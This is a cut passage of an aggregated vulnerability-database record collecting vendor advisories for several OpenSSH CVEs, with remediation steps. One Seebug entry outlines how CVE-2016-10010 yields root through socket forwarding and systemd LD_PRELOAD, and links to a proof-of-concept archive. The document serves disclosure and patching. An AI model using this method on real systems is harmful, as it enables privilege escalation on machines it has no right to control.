"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2018-15473", "CVE-2016-10708"], "description": "Robert Swiecki discovered that OpenSSH incorrectly handled certain messages. \nAn attacker could possibly use this issue to cause a denial of service. \nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. \n(CVE-2016-10708)\n\nIt was discovered that OpenSSH incorrectly handled certain requests. \nAn attacker could possibly use this issue to access sensitive information. \n(CVE-2018-15473)", "edition": 3, "modified": "2018-11-06T00:00:00", "published": "2018-11-06T00:00:00", "id": "USN-3809-1", "href": "https://ubuntu.com/security/notices/USN-3809-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2017-01-06T20:25:39", "published": "2017-01-06T20:25:39", "id": "FEDORA:D8A2B60A94E1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: openssh-7.4p1-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:27", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH information leak Vulnerability, CVE-2016-10011\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10011"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92581", "id": "SSV:92581", "sourceData": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:02:26", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH privilege escalation Vulnerability, CVE-2016-10010\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92580", "id": "SSV:92580", "sourceData": "\n Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n \r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n \r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n \r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92580"}, {"lastseen": "2017-11-19T12:02:31", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH authentication security bypass Vulnerability, CVE-2016-10012\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10012"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92582", "id": "SSV:92582", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:02:26", "description": "2016 12 on 19 May, the foreign vulnerability of the platform to publish the latest OpenSSH\uff08CVE-2016-10009 remote code execution vulnerability.**Since the problem is in ssh-agent, this process by default does not start, only in a multi-host Free the password the login will only be used to exploit conditions are relatively harsh, therefore the official vulnerability rating is only\u201cmedium-risk\u201dto. The user is still required as soon as possible to upgrade to the latest version.**\n\nOpenSSH 7.4 in 2016 12 December 19 officially released, the new version is ported in Linux, BSD, and other Unix-like platform on the SSH 2.0 Protocol full support, major fixes to the previous version found bugs and security issues. It should be noted that, the 7.4 version of the underlying changes that may affect existing configurations.\n\nAccording to the cyberspace search engine ZoomEye results show that the current Internet can be detected OpenSSH device about 19,659,712 station, these devices or become a hacker to attack a potential target.\n", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH remote code execution vulnerability, CVE-2016-10009\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10009"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92579", "id": "SSV:92579", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "centos": [{"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2029\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-cavs\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 6, "modified": "2017-08-24T01:40:16", "published": "2017-08-24T01:40:16", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html", "id": "CESA-2017:2029", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-12-11T13:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708", "CVE-2016-6210", "CVE-2016-6515"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:13", "published": "2017-08-01T09:57:17", "id": "RHSA-2017:2029", "href": "https://access.redhat.com/errata/RHSA-2017:2029", "type": "redhat", "title": "(RHSA-2017:2029) Moderate: openssh security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2019-05-29T19:19:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10012", "CVE-2016-8858"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued:Sun Feb 5 23:36:10 CST 2017 \n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2016-8858, \nCVE-2016-10009, CVE-2016-10011, CVE-2016-10012 )\n\n \n \n===============================================================================\n\nSUMMARY:\n\nVulnerabilities in OpenSSH affect AIX.\n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-8858\n DESCRIPTION: OpenSSH is vulnerable to a denial of service, caused by an\n error in the kex_input_kexinit() function. By sending specially crafted data\n during the key exchange process, a remote attacker could exploit this\n vulnerability to consume all available memory resources.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/118127 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2016-10009\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to execute\n arbitrary code on the system, caused by the loading of a specially crafted\n PKCS#11 module across a forwarded agent channel. An attacker could exploit \n this vulnerability to write files or execute arbitrary code on the system.\n CVSS Base Score: 6.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119828 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n \n CVEID: CVE-2016-10011\n DESCRIPTION:OpenSSH could allow a local authenticated attacker to obtain\n sensitive information, caused by a privilege separation flaw. An attacker \n could exploit this vulnerability to obtain host private key material and \n other sensitive information.\n CVSS Base Score: 5.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119830 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n CVEID: CVE-2016-10012\n DESCRIPTION:OpenSSH could allow a local attacker to gain elevated privileges\n on the system, caused by improper bounds checking in the shared memory\n manager. An attacker could exploit this vulnerability to gain elevated \n privileges on the system.\n CVSS Base Score: 5.9\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119831 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6203 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6203 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n\tFixes are available. The fixes can be downloaded via ftp and\n\thttp from:\n\n\tftp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttps://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\n\tThe links above are to a tar file containing this signed advisory, interim\n\tfixes, and OpenSSL signatures for each interim fix.\n\tThese fixes below include prerequisite checking. This will enforce the correct\n\tmapping between the fixes and AIX releases.\n\n\tNote that the tar file contains Interim fixes that are based on\n\tOpenSSH version as given below. \n\n\tYou must be on the 'prereq for installation' level before applying the interim\n\tfix. This may require installing a new level(prereq version) first.\n \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 2.2.* 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n\n\tLatest level of OpenSSH fileset is available from the web download site:\n\thttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n \n\tTo extract the fix from the tar file:\n\n\ttar xvf openssh_fix10.tar\n\tcd openssh_fix10\n\n\tVerify you have retrieved the fix intact:\n\n\tThe checksums below were generated using the\n\t\"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 771b1ce548ed725aae3e6b58960d62bfba6b4d77f48ed4b01b1bb1d6acece770 6203_ifix.170124.epkg.Z key_w_csum\n\n \n\tThese sums should match exactly. The OpenSSL signatures in the tar file and\n\ton this advisory can also be used to verify the integrity of the fixes. If \n the sums of the fixes. If the sums or signatures cannot be confirmed,\n\tcontact IBM AIX Security at security-alert@austin.ibm.com and describe\n\tthe discrepancy.\n \n\tPublished advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n \n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/118127\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119828\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119830\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119831\n CVE-2016-8858 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8858\n CVE-2016-10009: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009\n CVE-2016-10011: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011\n CVE-2016-10012: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Sun Feb 5 23:36:10 CST 2017\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n \n\n\n", "edition": 6, "modified": "2017-02-05T23:36:10", "published": "2017-02-05T23:36:10", "id": "OPENSSH_ADVISORY10.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc", "title": "Vulnerabilities in OpenSSH affect AIX.", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:13:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "[7.4p1-11 + 0.10.3-1]\n- Compiler warnings (#1341754)\n[7.4p1-10 + 0.10.3-1]\n- Add missing messages in FIPS mode (#1341754)\n[7.4p1-9 + 0.10.3-1]\n- Allow harmless syscalls for s390 crypto modules (#1451809)\n[7.4p1-8 + 0.10.3-1]\n- Fix multilib issue in documentation (#1450361)\n[7.4p1-6 + 0.10.3-1]\n- ControlPath too long should not be a fatal error (#1447561)\n[7.4p1-5 + 0.10.3-1]\n- Fix the default key exchange proposal in FIPS mode (#1438414)\n- Remove another wrong coverity chunk to unbreak gsskex (#1438414)\n[7.4p1-4 + 0.10.3-1]\n- Update seccomp filter to work on ppc64le (#1443916)\n[7.4p1-3 + 0.10.3-1]\n- Do not completely disable SHA-1 key exchange methods in FIPS (#1324493)\n- Remove wrong coverity patches\n[7.4p1-2 + 0.10.3-1]\n- Fix coverity scan results\n- Adjust FIPS algorithms list (#1420910)\n- Revert problematic feature for chroot(#1418062)\n- Fix CBC weakness in released OpenSSH 7.5\n[7.4p1-1 + 0.10.3-1]\n- Rebase to openssh 7.4 and pam_ssh_agent_auth 0.10.3 (#1341754)\n- detach -cavs subpackage\n- enable seccomp filter for sandboxed child", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2029", "href": "http://linux.oracle.com/errata/ELSA-2017-2029.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**Issue Overview:**\n\nA covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. ([CVE-2016-6210 __](<https://access.redhat.com/security/cve/CVE-2016-6210>))\n\nIt was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. ([CVE-2016-6515 __](<https://access.redhat.com/security/cve/CVE-2016-6515>))\n\nIt was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. ([CVE-2016-10009 __](<https://access.redhat.com/security/cve/CVE-2016-10009>))\n\nIt was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. ([CVE-2016-10011 __](<https://access.redhat.com/security/cve/CVE-2016-10011>))\n\nIt was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. ([CVE-2016-10012 __](<https://access.redhat.com/security/cve/CVE-2016-10012>))\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-ldap-7.4p1-11.68.amzn1.i686 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686 \n openssh-cavs-7.4p1-11.68.amzn1.i686 \n openssh-7.4p1-11.68.amzn1.i686 \n openssh-debuginfo-7.4p1-11.68.amzn1.i686 \n openssh-keycat-7.4p1-11.68.amzn1.i686 \n openssh-server-7.4p1-11.68.amzn1.i686 \n openssh-clients-7.4p1-11.68.amzn1.i686 \n \n src: \n openssh-7.4p1-11.68.amzn1.src \n \n x86_64: \n openssh-ldap-7.4p1-11.68.amzn1.x86_64 \n openssh-server-7.4p1-11.68.amzn1.x86_64 \n openssh-7.4p1-11.68.amzn1.x86_64 \n openssh-keycat-7.4p1-11.68.amzn1.x86_64 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64 \n openssh-cavs-7.4p1-11.68.amzn1.x86_64 \n openssh-debuginfo-7.4p1-11.68.amzn1.x86_64 \n openssh-clients-7.4p1-11.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-10-03T11:00:00", "published": "2017-10-03T11:00:00", "id": "ALAS-2017-898", "href": "https://alas.aws.amazon.com/ALAS-2017-898.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010"], "description": "\nProblem Description:\nThe ssh-agent(1) agent supports loading a PKCS#11 module\n\tfrom outside a trusted whitelist. An attacker can request\n\tloading of a PKCS#11 module across forwarded agent-socket.\n\t[CVE-2016-10009]\nWhen privilege separation is disabled, forwarded Unix\n\tdomain sockets would be created by sshd(8) with the privileges\n\tof 'root' instead of the authenticated user. [CVE-2016-10010]\nImpact:\nA remote attacker who have control of a forwarded\n\tagent-socket on a remote system and have the ability to\n\twrite files on the system running ssh-agent(1) agent can\n\trun arbitrary code under the same user credential. Because\n\tthe attacker must already have some control on both systems,\n\tit is relatively hard to exploit this vulnerability in a\n\tpractical attack. [CVE-2016-10009]\nWhen privilege separation is disabled (on FreeBSD,\n\tprivilege separation is enabled by default and has to be\n\texplicitly disabled), an authenticated attacker can potentially\n\tgain root privileges on systems running OpenSSH server.\n\t[CVE-2016-10010]\n", "edition": 7, "modified": "2017-01-13T00:00:00", "published": "2017-01-11T00:00:00", "id": "2C948527-D823-11E6-9171-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/2c948527-d823-11e6-9171-14dae9d210b8.html", "title": "FreeBSD -- OpenSSH multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-01-09T22:01:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010"], "edition": 2, "description": "\nThe OpenSSH project reports:\n\n\nssh-agent(1): Will now refuse to load PKCS#11 modules from\n\t paths outside a trusted whitelist (run-time configurable).\n\t Requests to load modules could be passed via agent forwarding\n\t and an attacker could attempt to load a hostile PKCS#11 module\n\t across the forwarded agent channel: PKCS#11 modules are shared\n\t libraries, so this would result in code execution on the system\n\t running the ssh-agent if the attacker has control of the\n\t forwarded agent-socket (on the host running the sshd server)\n\t and the ability to write to the filesystem of the host running\n\t ssh-agent (usually the host running the ssh client).\n\t (CVE-2016-10009)\nsshd(8): When privilege separation is disabled, forwarded\n\t Unix-domain sockets would be created by sshd(8) with the\n\t privileges of 'root' instead of the authenticated user. This\n\t release refuses Unix-domain socket forwarding when privilege\n\t separation is disabled (Privilege separation has been enabled by\n\t default for 14 years). CVE-2016-10010)\n\n\n", "modified": "2017-01-09T00:00:00", "published": "2016-12-25T00:00:00", "id": "2AEDD15F-CA8B-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/2aedd15f-ca8b-11e6-a9a5-b499baebfeaf.html", "title": "openssh -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2020-08-12T01:03:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Package : openssh\nVersion : 1:6.7p1-5+deb8u6\nCVE ID : CVE-2015-5352 CVE-2015-5600 CVE-2015-6563 CVE-2015-6564\n CVE-2016-1908 CVE-2016-3115 CVE-2016-6515 CVE-2016-10009\n CVE-2016-10011 CVE-2016-10012 CVE-2016-10708\n CVE-2017-15906\nDebian Bug : 790798 793616 795711 848716 848717\n\n\nSeveral vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\n OpenSSH incorrectly verified time window deadlines for X connections.\n Remote attackers could take advantage of this flaw to bypass intended\n access restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\n OpenSSH improperly restricted the processing of keyboard-interactive\n devices within a single connection, which could allow remote attackers\n to perform brute-force attacks or cause a denial of service, in a\n non-default configuration.\n\nCVE-2015-6563\n\n OpenSSH incorrectly handled usernames during PAM authentication. In\n conjunction with an additional flaw in the OpenSSH unprivileged child\n process, remote attackers could make use if this issue to perform user\n impersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\n Moritz Jodeit discovered a use-after-free flaw in PAM support in\n OpenSSH, that could be used by remote attackers to bypass\n authentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\n OpenSSH mishandled untrusted X11 forwarding when the X server disables\n the SECURITY extension. Untrusted connections could obtain trusted X11\n forwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\n OpenSSH improperly handled X11 forwarding data related to\n authentication credentials. Remote authenticated users could make use\n of this flaw to bypass intended shell-command restrictions. Identified\n by github.com/tintinweb.\n\nCVE-2016-6515\n\n OpenSSH did not limit password lengths for password authentication.\n Remote attackers could make use of this flaw to cause a denial of\n service via long strings.\n\nCVE-2016-10009\n\n Jann Horn discovered an untrusted search path vulnerability in\n ssh-agent allowing remote attackers to execute arbitrary local\n PKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\n Jann Horn discovered that OpenSSH did not properly consider the\n effects of 